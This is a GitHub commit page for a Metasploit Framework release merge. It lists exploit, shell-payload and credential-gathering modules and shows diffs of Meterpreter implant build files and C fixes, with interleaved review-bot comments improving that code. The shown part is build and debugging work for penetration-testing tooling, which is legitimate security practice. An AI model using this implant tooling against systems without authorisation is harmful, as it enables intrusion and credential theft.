
Merge branch 'release/20120213000001' into stable

Conflicts:
	modules/auxiliary/scanner/vmware/vmware_http_login.rb
2 parents d70596a + 794ebe4 commit ad0251e256a81c11fa4a5d2db3108425a89269f8 Jenkins committed Feb 16, 2012
Showing with 4,058 additions and 764 deletions.
  1. BIN data/meterpreter/ext_server_networkpug.lso
  2. BIN data/meterpreter/ext_server_sniffer.lso
  3. BIN data/meterpreter/ext_server_stdapi.lso
  4. BIN data/meterpreter/msflinker_linux_x86.bin
  5. BIN data/templates/template_x64_darwin.bin
  6. +38 −25 external/source/meterpreter/Makefile
  7. +2 −0 external/source/meterpreter/source/bionic/libdl/Makefile
  8. +3 −0 external/source/meterpreter/source/bionic/libm/msfMakefile
  9. +3 −3 external/source/meterpreter/source/common/arch/posix/scheduler.c
  10. +1 −1 external/source/meterpreter/source/extensions/networkpug/networkpug.c
  11. +2 −2 external/source/meterpreter/source/extensions/sniffer/sniffer.c
  12. +25 −6 external/source/meterpreter/source/extensions/stdapi/server/fs/dir.c
  13. +14 −14 external/source/meterpreter/source/extensions/stdapi/server/fs/fs_util.c
  14. +202 −102 external/source/meterpreter/source/extensions/stdapi/server/net/config/interface.c
  15. +1 −1 external/source/meterpreter/source/server/linux/netlink.c
  16. +33 −38 external/source/meterpreter/source/server/rtld/Makefile
  17. +1 −1 external/source/meterpreter/source/server/rtld/metsrv_rtld.c
  18. +1 −1 external/source/meterpreter/source/server/server_setup.c
  19. +4 −0 external/source/meterpreter/workspace/common/Makefile
  20. +4 −1 external/source/meterpreter/workspace/ext_posix_sample/Makefile
  21. +12 −10 external/source/meterpreter/workspace/ext_server_networkpug/Makefile
  22. +6 −2 external/source/meterpreter/workspace/ext_server_sniffer/Makefile
  23. +17 −9 external/source/meterpreter/workspace/ext_server_stdapi/Makefile
  24. +4 −1 external/source/meterpreter/workspace/metsrv/Makefile
  25. +3 −2 external/source/shellcode/Makefile.incl
  26. +2 −2 external/source/shellcode/bsd/ia32/Makefile
  27. +36 −0 external/source/shellcode/bsd/ia32/single_bind_tcp_shell_ipv6.asm
  28. +42 −0 external/source/shellcode/bsd/ia32/single_reverse_tcp_shell_ipv6.asm
  29. +108 −0 external/source/shellcode/bsd/ia32/stager_sock_bind_ipv6.asm
  30. +112 −0 external/source/shellcode/bsd/ia32/stager_sock_reverse_ipv6.asm
  31. +30 −20 lib/fastlib.rb
  32. +12 −13 lib/msf/core/db.rb
  33. +4 −4 lib/msf/core/event_dispatcher.rb
  34. +5 −1 lib/msf/core/exploit/capture.rb
  35. +19 −16 lib/msf/core/exploit/http/client.rb
  36. +1 −0 lib/msf/core/exploit/http/server.rb
  37. +4 −4 lib/msf/core/exploit/mssql.rb
  38. +1 −1 lib/msf/core/exploit/postgres.rb
  39. +33 −0 lib/msf/core/post/unix/enum_user_dirs.rb
  40. +4 −0 lib/msf/core/rpc/v10/rpc_auth.rb
  41. +5 −0 lib/msf/core/rpc/v10/service.rb
  42. +27 −2 lib/msf/ui/banner.rb
  43. +27 −1 lib/msf/util/exe.rb
  44. +1 −1 lib/rex/parser/nokogiri_doc_mixin.rb
  45. +11 −0 lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_netapi32.rb
  46. +6 −0 lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ws2_32.rb
  47. +1 −0 lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
  48. +3 −1 lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb
  49. +2 −2 lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb
  50. +48 −29 lib/rex/registry/hive.rb
  51. +4 −6 lib/rex/registry/regf.rb
  52. +7 −2 lib/rex/ui/text/table.rb
  53. +12 −10 modules/auxiliary/admin/natpmp/natpmp_map.rb
  54. +14 −12 modules/auxiliary/gather/natpmp_external_address.rb
  55. +15 −6 modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb
  56. +8 −0 modules/auxiliary/scanner/discovery/ipv6_neighbor.rb
  57. +1 −1 modules/auxiliary/scanner/mssql/mssql_ping.rb
  58. +14 −12 modules/auxiliary/scanner/natpmp/natpmp_portscan.rb
  59. +15 −16 modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb
  60. +3 −3 modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb
  61. +1 −1 modules/exploits/linux/http/piranha_passwd_exec.rb
  62. +6 −6 modules/exploits/linux/telnet/telnet_encrypt_keyid.rb
  63. +1 −1 modules/exploits/multi/http/tomcat_mgr_deploy.rb
  64. +1 −0 modules/exploits/multi/http/vbseo_proc_deutf.rb
  65. +9 −8 modules/exploits/osx/browser/mozilla_mchannel.rb
  66. +327 −0 modules/exploits/windows/browser/adobe_flash_sps.rb
  67. +122 −0 modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb
  68. +1 −1 modules/exploits/windows/browser/enjoysapgui_comp_download.rb
  69. +1 −1 modules/exploits/windows/browser/real_arcade_installerdlg.rb
  70. +1 −1 modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb
  71. +1 −1 modules/exploits/windows/fileformat/mediajukebox.rb
  72. +1 −1 modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb
  73. +1 −1 modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb
  74. +1 −1 modules/exploits/windows/fileformat/vlc_modplug_s3m.rb
  75. +1 −1 modules/exploits/windows/fileformat/vlc_webm.rb
  76. +1 −1 modules/exploits/windows/ftp/easyftp_list_fixret.rb
  77. +1 −1 modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb
  78. +1 −1 modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb
  79. +1 −1 modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb
  80. +1 −1 modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb
  81. +1 −1 modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb
  82. +1 −1 modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb
  83. +1 −1 modules/exploits/windows/http/ibm_tsm_cad_header.rb
  84. +2 −1 modules/exploits/windows/http/xampp_webdav_upload_php.rb
  85. +1 −1 modules/exploits/windows/lotus/domino_http_accept_language.rb
  86. +1 −1 modules/exploits/windows/misc/avidphoneticindexer.rb
  87. +117 −0 modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb
  88. +2 −1 modules/exploits/windows/misc/stream_down_bof.rb
  89. +2 −2 modules/exploits/windows/pop3/seattlelab_pass.rb
  90. +1 −1 modules/exploits/windows/scada/citect_scada_odbc.rb
  91. +90 −0 modules/exploits/windows/scada/sunway_force_control_netdbsrv.rb
  92. +1 −1 modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb
  93. +1 −1 modules/exploits/windows/ssh/freeftpd_key_exchange.rb
  94. +52 −0 modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb
  95. +56 −0 modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb
  96. +58 −0 modules/payloads/stagers/bsd/x86/bind_ipv6_tcp.rb
  97. +67 −0 modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb
  98. +155 −0 modules/post/linux/gather/mount_cifs_creds.rb
  99. +168 −0 modules/post/multi/gather/fetchmailrc_creds.rb
  100. +6 −1 modules/post/multi/gather/filezilla_client_cred.rb
  101. +108 −0 modules/post/multi/gather/netrc_creds.rb
  102. +4 −10 modules/post/windows/escalate/net_runtime_modify.rb
  103. +1 −6 modules/post/windows/escalate/service_permissions.rb
  104. +6 −1 modules/post/windows/gather/credentials/coreftp.rb
  105. +6 −1 modules/post/windows/gather/credentials/enum_cred_store.rb
  106. +0 −12 modules/post/windows/gather/credentials/enum_picasa_pwds.rb
  107. +6 −1 modules/post/windows/gather/credentials/epo_sql.rb
  108. +22 −6 modules/post/windows/gather/credentials/filezilla_server.rb
  109. +6 −1 modules/post/windows/gather/credentials/flashfxp.rb
  110. +6 −2 modules/post/windows/gather/credentials/ftpnavigator.rb
  111. +6 −1 modules/post/windows/gather/credentials/mremote.rb
  112. +12 −14 modules/post/windows/gather/credentials/outlook.rb
  113. +6 −1 modules/post/windows/gather/credentials/smartftp.rb
  114. +6 −1 modules/post/windows/gather/credentials/total_commander.rb
  115. +12 −2 modules/post/windows/gather/credentials/vnc.rb
  116. +12 −2 modules/post/windows/gather/credentials/winscp.rb
  117. +6 −1 modules/post/windows/gather/credentials/wsftp_client.rb
  118. +0 −26 modules/post/windows/gather/enum_domains.rb
  119. +0 −6 modules/post/windows/gather/reverse_lookup.rb
  120. +1 −1 modules/post/windows/gather/usb_history.rb
  121. +7 −6 modules/post/windows/manage/download_exec.rb
  122. +0 −41 modules/post/windows/recon/computer_browser_discovery.rb
  123. +0 −1 modules/post/windows/recon/resolve_hostname.rb
  124. +1 −1 msfbinscan
  125. +1 −2 msfcli
  126. +1 −1 msfconsole
  127. +1 −1 msfd
  128. +1 −1 msfelfscan
  129. +1 −1 msfencode
  130. +1 −1 msfmachscan
  131. +1 −1 msfpayload
  132. +1 −1 msfpescan
  133. +1 −1 msfrop
  134. +1 −1 msfrpc
  135. +1 −1 msfrpcd
  136. +1 −1 msfvenom
  137. +70 −80 plugins/nessus.rb
  138. +301 −0 scripts/resource/auto_cred_checker.rc
  139. +748 −0 scripts/resource/basic_discovery.rc
  140. +119 −0 scripts/resource/multi_post.rc
  141. +28 −13 scripts/resource/portscan.rc
  142. +9 −2 tools/exe2vba.rb
  143. +9 −2 tools/exe2vbs.rb
  144. +8 −1 tools/find_badchars.rb
  145. +8 −2 tools/halflm_second.rb
  146. +12 −0 tools/list_interfaces.rb
  147. +9 −2 tools/lm2ntcrack.rb
  148. +9 −1 tools/metasm_shell.rb
  149. +9 −2 tools/module_author.rb
  150. +9 −2 tools/module_changelog.rb
  151. +9 −2 tools/module_disclodate.rb
  152. +9 −2 tools/module_license.rb
  153. +9 −2 tools/module_mixins.rb
  154. +9 −2 tools/module_ports.rb
  155. +9 −2 tools/module_rank.rb
  156. +9 −2 tools/module_reference.rb
  157. +9 −2 tools/module_targets.rb
  158. +10 −3 tools/msf_irb_shell.rb
  159. +25 −5 tools/msftidy.rb
  160. +9 −1 tools/nasm_shell.rb
  161. +9 −1 tools/pattern_create.rb
  162. +9 −1 tools/pattern_offset.rb
  163. +9 −2 tools/payload_lengths.rb
  164. +54 −47 tools/reg.rb
BIN data/meterpreter/ext_server_networkpug.lso
Binary file not shown.
BIN data/meterpreter/ext_server_sniffer.lso
Binary file not shown.
BIN data/meterpreter/ext_server_stdapi.lso
Binary file not shown.
BIN data/meterpreter/msflinker_linux_x86.bin 100755 → 100644
Binary file not shown.
BIN data/templates/template_x64_darwin.bin
Binary file not shown.
63 external/source/meterpreter/Makefile
@@ -15,10 +15,24 @@ objects += data/meterpreter/ext_server_stdapi.lso
objects += data/meterpreter/ext_server_sniffer.lso
objects += data/meterpreter/ext_server_networkpug.lso
+BIONIC=$(PWD)/external/source/meterpreter/source/bionic
+LIBC=$(BIONIC)/libc
+LIBM=$(BIONIC)/libm
+COMPILED=$(BIONIC)/compiled
+
+PCAP_CFLAGS = -march=i386 -m32 -Wl,--hash-style=sysv -fno-stack-protector -nostdinc -nostdlib -fPIC -DPIC -g -Wall -D_UNIX -D__linux__ -I$(LIBC)/include -I$(LIBC)/kernel/common/linux/ -I$(LIBC)/kernel/common/ -I$(LIBC)/arch-x86/include/ -I$(LIBC)/kernel/arch-x86/ -Dwchar_t="char" -fno-builtin -D_SIZE_T_DECLARED -DElf_Size="u_int32_t" -D_BYTE_ORDER=_LITTLE_ENDIAN -lgcc -L$(COMPILED) -fPIC -Os -lc
+
+OSSL_CFLAGS=-Os -Wl,--hash-style=sysv -march=i386 -m32 -nostdinc -nostdlib -fno-builtin -fpic -I $(LIBC)/include -I $(LIBC)/kernel/common/linux/ -I $(LIBC)/kernel/common/ -I $(LIBC)/arch-x86/include/ -I $(LIBC)/kernel/arch-x86/ -I$(LIBC)/private -I$(LIBM)/include -DPIC -Dwchar_t='char' -D_SIZE_T_DECLARED -DElf_Size='u_int32_t' -D_BYTE_ORDER=_LITTLE_ENDIAN -L$(COMPILED) -lc
+
workspace = external/source/meterpreter/workspace
all: $(objects)
+debug: DEBUG=true
+# I'm 99% sure this is the wrong way to do this
+debug: MAKE += debug
+debug: all
+
external/source/meterpreter/source/bionic/compiled/libc.so: external/source/meterpreter/source/bionic/compiled
(cd external/source/meterpreter/source/bionic/libc && ARCH=x86 TOP=${PWD} jam && cd out/x86/ && sh make.sh && [ -f libbionic.so ] )
cp external/source/meterpreter/source/bionic/libc/out/x86/libbionic.so external/source/meterpreter/source/bionic/compiled/libc.so
@@ -27,38 +41,33 @@ external/source/meterpreter/source/bionic/compiled:
mkdir external/source/meterpreter/source/bionic/compiled/
external/source/meterpreter/source/bionic/compiled/libm.so:
- (cd external/source/meterpreter/source/bionic/libm && make -f msfMakefile && [ -f libm.so ])
- cp external/source/meterpreter/source/bionic/libm/libm.so external/source/meterpreter/source/bionic/compiled/libm.so
+ $(MAKE) -C $(LIBM) -f msfMakefile && [ -f $(LIBM)/libm.so ]
+ cp $(LIBM)/libm.so $(COMPILED)/libm.so
external/source/meterpreter/source/bionic/compiled/libdl.so:
- (cd external/source/meterpreter/source/bionic/libdl && make && [ -f libdl.so ])
- cp external/source/meterpreter/source/bionic/libdl/libdl.so external/source/meterpreter/source/bionic/compiled/libdl.so
+ $(MAKE) -C $(BIONIC)/libdl && [ -f $(BIONIC)/libdl/libdl.so ]
+ cp $(BIONIC)/libdl/libdl.so $(COMPILED)/libdl.so
external/source/meterpreter/source/bionic/compiled/libcrypto.so: tmp/openssl-0.9.8o/libssl.so
- cp tmp/openssl-0.9.8o/libcrypto.so external/source/meterpreter/source/bionic/compiled/libcrypto.so
+ cp tmp/openssl-0.9.8o/libcrypto.so external/source/meterpreter/source/bionic/compiled/libcrypto.so
external/source/meterpreter/source/bionic/compiled/libssl.so: tmp/openssl-0.9.8o/libssl.so
cp tmp/openssl-0.9.8o/libssl.so external/source/meterpreter/source/bionic/compiled/libssl.so
-LIBC=$(PWD)/external/source/meterpreter/source/bionic/libc
-LIBM=$(PWD)/external/source/meterpreter/source/bionic/libm
-COMPILED=$(PWD)/external/source/meterpreter/source/bionic/compiled
-MSF_CFLAGS=-Os -Wl,--hash-style=sysv -march=i386 -m32 -nostdinc -nostdlib -fno-builtin -fpic -I $(LIBC)/include -I $(LIBC)/kernel/common/linux/ -I $(LIBC)/kernel/common/ -I $(LIBC)/arch-x86/include/ -I $(LIBC)/kernel/arch-x86/ -I$(LIBC)/private -I$(LIBM)/include -DPIC -Dwchar_t='char' -D_SIZE_T_DECLARED -DElf_Size='u_int32_t' -D_BYTE_ORDER=_LITTLE_ENDIAN -L$(COMPILED) -lc
-
tmp/openssl-0.9.8o/libssl.so:
- [ -d tmp ] || mkdir tmp
+ [ -d tmp ] || mkdir tmp
[ -d tmp/openssl-0.9.8o ] || wget -O tmp/openssl-0.9.8o.tar.gz http://openssl.org/source/openssl-0.9.8o.tar.gz
[ -f tmp/openssl-0.9.8o/Configure ] || tar -C tmp/ -xzf tmp/openssl-0.9.8o.tar.gz
(cd tmp/openssl-0.9.8o && \
cat Configure | grep -v 'linux-msf' | \
sed -e 's#my %table=(#my %table=( \
- "linux-msf", "gcc:$(MSF_CFLAGS) -DL_ENDIAN -DTERMIO -Wall::$(MSF_CFLAGS) -D_REENTRANT::$(MSF_CFLAGS) -ldl:BN_LLONG $${x86_gcc_des} $${x86_gcc_opts}:$${x86_elf_asm}:dlfcn:linux-shared:$(MSF_CFLAGS) -fPIC::.so.\\$$\\$$(SHLIB_MAJOR).\\$$\\$$(SHLIB_MINOR)",\
+ "linux-msf", "gcc:$(OSSL_CFLAGS) -DL_ENDIAN -DTERMIO -Wall::$(OSSL_CFLAGS) -D_REENTRANT::$(OSSL_CFLAGS) -ldl:BN_LLONG $${x86_gcc_des} $${x86_gcc_opts}:$${x86_elf_asm}:dlfcn:linux-shared:$(OSSL_CFLAGS) -fPIC::.so.\\$$\\$$(SHLIB_MAJOR).\\$$\\$$(SHLIB_MINOR)",\
#;' > Configure-msf;\
cp Configure-msf Configure && chmod +x Configure && \
grep linux-msf Configure && \
./Configure --prefix=/tmp/out threads shared no-hw no-dlfcn no-zlib no-krb5 no-idea 386 linux-msf \
)
- (cd tmp/openssl-0.9.8o && make CC="gcc -march=i386 -m32 -Os -Wl,--hash-style=sysv -I${PWD}/external/source/meterpreter/source/bionic/libc/include -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/common/linux/ -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/common/ -I${PWD}/external/source/meterpreter/source/bionic/libc/arch-x86/include/ -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/arch-x86/ -I${PWD}/external/source/meterpreter/source/bionic/libc/private -fPIC -DPIC -nostdinc -nostdlib -Dwchar_t='char' -fno-builtin -D_SIZE_T_DECLARED -DElf_Size='u_int32_t' -I${PWD}/external/source/meterpreter/source/bionic/libm/include -L${PWD}/external/source/meterpreter/source/bionic/compiled -D_BYTE_ORDER=_LITTLE_ENDIAN -lc" depend all ; [ -f libssl.so.0.9.8 -a -f libcrypto.so.0.9.8 ] )
+ (cd tmp/openssl-0.9.8o && make depend all ; [ -f libssl.so.0.9.8 -a -f libcrypto.so.0.9.8 ] )
cp tmp/openssl-0.9.8o/libssl.so* tmp/openssl-0.9.8o/libcrypto.so* external/source/meterpreter/source/openssl/lib/linux/i386/
external/source/meterpreter/source/bionic/compiled/libpcap.so: tmp/libpcap-1.1.1/libpcap.so.1.1.1
@@ -77,42 +86,42 @@ tmp/libpcap-1.1.1/libpcap.so.1.1.1:
echo '#define _STDLIB_H this_works_around_malloc_definition_in_grammar_dot_c' >> tmp/libpcap-1.1.1/config.h
(cd tmp/libpcap-1.1.1 && patch --dry-run -p0 < ../../external/source/meterpreter/source/libpcap/pcap_nametoaddr_fix.diff && patch -p0 < ../../external/source/meterpreter/source/libpcap/pcap_nametoaddr_fix.diff)
sed -i -e s/pcap-usb-linux.c//g -e s/fad-getad.c/fad-gifc.c/g tmp/libpcap-1.1.1/Makefile
- sed -i -e s^"CC = gcc"^"CC = gcc -march=i386 -m32 -Wl,--hash-style=sysv -fno-stack-protector -nostdinc -nostdlib -fPIC -DPIC -g -Wall -D_UNIX -D__linux__ -I${PWD}/external/source/meterpreter/source/bionic/libc/include -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/common/linux/ -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/common/ -I${PWD}/external/source/meterpreter/source/bionic/libc/arch-x86/include/ -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/arch-x86/ -Dwchar_t="char" -fno-builtin -D_SIZE_T_DECLARED -DElf_Size="u_int32_t" -D_BYTE_ORDER=_LITTLE_ENDIAN -lgcc -L${PWD}/external/source/meterpreter/source/bionic/compiled -gstabs+ -fPIC -Os -lc"^g tmp/libpcap-1.1.1/Makefile
- (cd tmp/libpcap-1.1.1 && make)
+ sed -i -e s^"CC = gcc"^"CC = gcc $(PCAP_CFLAGS)"^g tmp/libpcap-1.1.1/Makefile
+ $(MAKE) -C tmp/libpcap-1.1.1
data/meterpreter/msflinker_linux_x86.bin: external/source/meterpreter/source/server/rtld/msflinker.bin
cp external/source/meterpreter/source/server/rtld/msflinker.bin data/meterpreter/msflinker_linux_x86.bin
external/source/meterpreter/source/server/rtld/msflinker.bin: external/source/meterpreter/source/bionic/compiled/libc.so
- (cd external/source/meterpreter/source/server/rtld ; make)
+ $(MAKE) -C external/source/meterpreter/source/server/rtld
$(workspace)/metsrv/libmetsrv_main.so:
- (cd $(workspace)/metsrv && make)
+ $(MAKE) -C $(workspace)/metsrv
external/source/meterpreter/source/bionic/compiled/libmetsrv_main.so: $(workspace)/metsrv/libmetsrv_main.so
- cp $(workspace)/metsrv/libmetsrv_main.so external/source/meterpreter/source/bionic/compiled/libmetsrv_main.so
+ cp $(workspace)/metsrv/libmetsrv_main.so external/source/meterpreter/source/bionic/compiled/libmetsrv_main.so
$(workspace)/common/libsupport.so:
- (cd $(workspace)/common && make)
+ $(MAKE) -C $(workspace)/common
external/source/meterpreter/source/bionic/compiled/libsupport.so: $(workspace)/common/libsupport.so
cp $(workspace)/common/libsupport.so external/source/meterpreter/source/bionic/compiled/libsupport.so
$(workspace)/ext_server_sniffer/ext_server_sniffer.so:
- (cd $(workspace)/ext_server_sniffer && make)
+ $(MAKE) -C $(workspace)/ext_server_sniffer
data/meterpreter/ext_server_sniffer.lso: $(workspace)/ext_server_sniffer/ext_server_sniffer.so
cp $(workspace)/ext_server_sniffer/ext_server_sniffer.so data/meterpreter/ext_server_sniffer.lso
$(workspace)/ext_server_stdapi/ext_server_stdapi.so:
- (cd $(workspace)/ext_server_stdapi && make)
+ $(MAKE) -C $(workspace)/ext_server_stdapi
-data/meterpreter/ext_server_stdapi.lso: $(workspace)/ext_server_stdapi/ext_server_stdapi.so
+data/meterpreter/ext_server_stdapi.lso: $(workspace)/ext_server_stdapi/ext_server_stdapi.so
cp $(workspace)/ext_server_stdapi/ext_server_stdapi.so data/meterpreter/ext_server_stdapi.lso
$(workspace)/ext_server_networkpug/ext_server_networkpug.so:
- (cd $(workspace)/ext_server_networkpug && make)
+ $(MAKE) -C $(workspace)/ext_server_networkpug
data/meterpreter/ext_server_networkpug.lso: $(workspace)/ext_server_networkpug/ext_server_networkpug.so
cp $(workspace)/ext_server_networkpug/ext_server_networkpug.so data/meterpreter/ext_server_networkpug.lso
@@ -128,13 +137,17 @@ clean:
(cd $(workspace) && make clean)
clean-pcap:
- (cd tmp/libpcap-1.1.1/ && make clean)
+ #(cd tmp/libpcap-1.1.1/ && make clean)
+ # This avoids the pcap target trying to patch the same file more than once.
+ # It's a pretty small tar, so untar'ing goes pretty quickly anyway, in
+ # contrast to openssl.
+ rm -r tmp/libpcap-1.1.1 || true
clean-ssl:
(cd tmp/openssl-0.9.8o/ && make clean)
really-clean: clean clean-ssl clean-pcap
-.PHONY: clean clean-ssl clean-pcap really-clean
+.PHONY: clean clean-ssl clean-pcap really-clean debug
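Review bot: The rewritten `tmp/openssl-0.9.8o/libssl.so` recipe still fetches its input with `wget ... http://openssl.org/source/openssl-0.9.8o.tar.gz` and unpacks whatever arrives, with no digest check; the resulting libssl/libcrypto are copied into `external/source/meterpreter/source/openssl/lib/linux/i386/` and into `bionic/compiled`, which is the `-L` path the meterpreter objects link against, so a tampered download would end up in the prebuilt blobs this same commit updates under `data/meterpreter`. Pinning a digest and verifying it between the `wget` and `tar` lines, e.g. `echo "<expected sha256>  tmp/openssl-0.9.8o.tar.gz" | sha256sum -c -`, closes that gap, and the libpcap fetch above this hunk deserves the same treatment. Separately, `debug: MAKE += debug` (flagged by its own "99% sure this is the wrong way" comment) appends a goal to every `$(MAKE) -C ...` invocation, which only works while every sub-Makefile defines a `debug` target; passing the goal explicitly, e.g. `$(MAKE) -C $(LIBM) -f msfMakefile $(GOAL)` with `debug: GOAL=debug`, says what is intended and fails loudly where it is missing.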
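--- a/external/source/meterpreter/source/bionic/libdl/Makefile
+++ b/external/source/meterpreter/source/bionic/libdl/Makefile
@@ -8,5 +8,7 @@ CFLAGS+= -march=i386 -m32
 all:
 gcc -Wl,--hash-style=sysv -shared -o libdl.so $(CFLAGS) libdl.c
+debug: all
+
 clean:
 rm libdl.so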
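--- a/external/source/meterpreter/source/bionic/libm/msfMakefile
+++ b/external/source/meterpreter/source/bionic/libm/msfMakefile
@@ -224,6 +224,9 @@ SOBJ=$(OBJ:.S=.o)
 all: $(OBJ) ${SOBJ}
 gcc ${CFLAGS} -shared -nostdinc -nostdlib -o libm.so *.o
+debug: CFLAGS+=-ggdb
+debug: all
+
 .S.o:
 gcc ${CFLAGS} -nostdinc -nostdlib -c $<
 .c.o: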
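--- a/external/source/meterpreter/source/common/arch/posix/scheduler.c
+++ b/external/source/meterpreter/source/common/arch/posix/scheduler.c
@@ -58,8 +58,8 @@ DWORD scheduler_destroy( VOID )
 polltable = NULL;
 nentries = ntableentries = 0;
 }
-
- dprintf("[%s] Now for the fun part, iterating through list and removing items");
+
+ dprintf("[%s] Now for the fun part, iterating through list and removing items", __FUNCTION__);
 LIST_FOREACH_SAFE(current, &WEHead, link, tmp)
 {
@@ -84,7 +84,7 @@ DWORD scheduler_destroy( VOID )
 DWORD scheduler_initialize( Remote * remote )
 {
 if(scheduler_thread) {
- dprintf("[%s] Hmmm. scheduler_initialize() called twice?");
+ dprintf("[%s] Hmmm. scheduler_initialize() called twice?", __FUNCTION__);
 return ERROR_SUCCESS;
 }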
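--- a/external/source/meterpreter/source/extensions/networkpug/networkpug.c
+++ b/external/source/meterpreter/source/extensions/networkpug/networkpug.c
@@ -178,7 +178,7 @@ void free_networkpug(NetworkPug *np, int close_channel, int destroy_channel)
 cont = __atomic_swap(0, &np->active);
 if(! cont) {
- dprintf("Seems the pug at %p was already set free");
+ dprintf("Seems the pug at %p was already set free", &np);
 return;
 }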
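Review bot: The argument added to the `dprintf` is `&np`, the address of the local parameter on the stack, not the pug; `np` is already the `NetworkPug *` the message refers to (see the `free_networkpug(NetworkPug *np, ...)` signature in the hunk header), so every call prints a meaningless stack address. The line should read `dprintf("Seems the pug at %p was already set free", np);`. `free_networkpug` continues past the end of the hunk.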
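--- a/external/source/meterpreter/source/extensions/sniffer/sniffer.c
+++ b/external/source/meterpreter/source/extensions/sniffer/sniffer.c
@@ -74,7 +74,7 @@ char *get_interface_name_by_index(unsigned int fidx)
 interfaces = int_iter = NULL;
 if(pcap_findalldevs(&interfaces, errbuf) == -1) {
- dprintf("[%s] Hmm, out of memory? (errno = %d, but probably not useful)", errno);
+ dprintf("[%s] Hmm, out of memory? (errno = %d, but probably not useful)", __FUNCTION__, errno);
 return NULL;
 }
@@ -399,7 +399,7 @@ void packet_handler(u_char *user, const struct pcap_pkthdr *h, const u_char *byt
 pkt = calloc(sizeof(PeterPacket) + h->caplen, 1);
 if(! pkt) {
- dprintf("[%s] ho hum, no memory. maybe a pcap_breakloop / stop running?");
+ dprintf("[%s] ho hum, no memory. maybe a pcap_breakloop / stop running?", __FUNCTION__);
 return;
 }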
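Review bot: The first hunk fixes the missing `__FUNCTION__` argument but keeps guessing "out of memory?" while discarding `errbuf`, the buffer `pcap_findalldevs(&interfaces, errbuf)` writes its actual failure reason into; the message itself admits `errno` is "probably not useful". Logging the buffer makes an interface-enumeration failure on the target diagnosable: `dprintf("[%s] pcap_findalldevs failed: %s", __FUNCTION__, errbuf);`. `get_interface_name_by_index` continues outside the hunk.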
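--- a/external/source/meterpreter/source/extensions/stdapi/server/fs/dir.c
+++ b/external/source/meterpreter/source/extensions/stdapi/server/fs/dir.c
@@ -101,9 +101,13 @@ DWORD request_fs_ls(Remote *remote, Packet *packet)
 goto out;
 }
 data = readdir(ctx);
+ if (!(baseDirectory = _strdup(directory)))
+ {
+ result = ERROR_NOT_ENOUGH_MEMORY;
+ goto out;
+ }
 #define DF_NAME data->d_name
-
 #endif
 do
@@ -138,7 +142,11 @@ DWORD request_fs_ls(Remote *remote, Packet *packet)
 // Build the full path
 if (baseDirectory)
+#ifdef _WIN32
 sprintf(tempFile, "%s\\%s", baseDirectory, DF_NAME);
+#else
+ sprintf(tempFile, "%s/%s", baseDirectory, DF_NAME);
+#endif
 else
 sprintf(tempFile, "%s", DF_NAME);
@@ -211,21 +219,32 @@ DWORD request_fs_getwd(Remote *remote, Packet *packet)
 #ifdef _WIN32
 if (!(realSize = GetCurrentDirectory(directorySize, directory)))
-#else
- if (!(realSize = getcwd(directory, directorySize)))
-#endif
 {
 result = ERROR_NOT_ENOUGH_MEMORY;
 break;
 }
 else if (realSize > directorySize)
 {
 free(directory);
-
 directorySize = realSize;
-
 goto again;
 }
+#else
+ if (!getcwd(directory, directorySize))
+ {
+ if (errno == ERANGE && directorySize > 0)
+ {
+ // Then we didn't allocate enough to hold the whole path,
+ // increase the size and try again.
+ free(directory);
+ directorySize = directorySize * 2;
+ goto again;
+ } else {
+ dprintf("getcwd failed with errno %d", errno);
+ break;
+ }
+ }
+#endif
 packet_add_tlv_string(response, TLV_TYPE_DIRECTORY_PATH,
 directory);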
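Review bot: In the new POSIX branch of `request_fs_getwd`, the non-`ERANGE` path logs and `break`s without touching `result` or releasing `directory`, so unless the code after the loop (outside this hunk) handles it, the response goes out as a success that carries no path; `result = errno;` before the `break` keeps the failure visible to the client, and the `directorySize > 0` test is redundant once the size is doubled on every retry. In `request_fs_ls`, the added `sprintf(tempFile, "%s/%s", baseDirectory, DF_NAME)` is as unbounded as its Windows twin — if `tempFile` (declared outside the hunk) is a fixed array, `snprintf(tempFile, sizeof(tempFile), "%s/%s", baseDirectory, DF_NAME)` avoids an overflow on a long `directory` argument. `_strdup` is the MSVC spelling; on the POSIX side it only builds if the bionic tree provides it, otherwise this wants `strdup`. Both functions begin and end outside the hunk, and whether `baseDirectory` is freed at `out:` is not visible here.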
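--- a/external/source/meterpreter/source/extensions/stdapi/server/fs/fs_util.c
+++ b/external/source/meterpreter/source/extensions/stdapi/server/fs/fs_util.c
@@ -50,19 +50,19 @@ int fs_stat(LPCSTR filename, struct meterp_stat *buf) {
 ret = stat(filename, &sbuf);
 if (ret == 0) {
- buf->st_dev = sbuf.st_dev;
- buf->st_ino = sbuf.st_ino;
- buf->st_mode = sbuf.st_mode;
- buf->st_nlink = sbuf.st_nlink;
- buf->st_uid = sbuf.st_uid;
- buf->st_gid = sbuf.st_gid;
- buf->st_rdev = sbuf.st_rdev;
- buf->st_size = sbuf.st_size;
- buf->st_atime = (unsigned long long)sbuf.st_atime;
- buf->st_mtime = (unsigned long long)sbuf.st_mtime;
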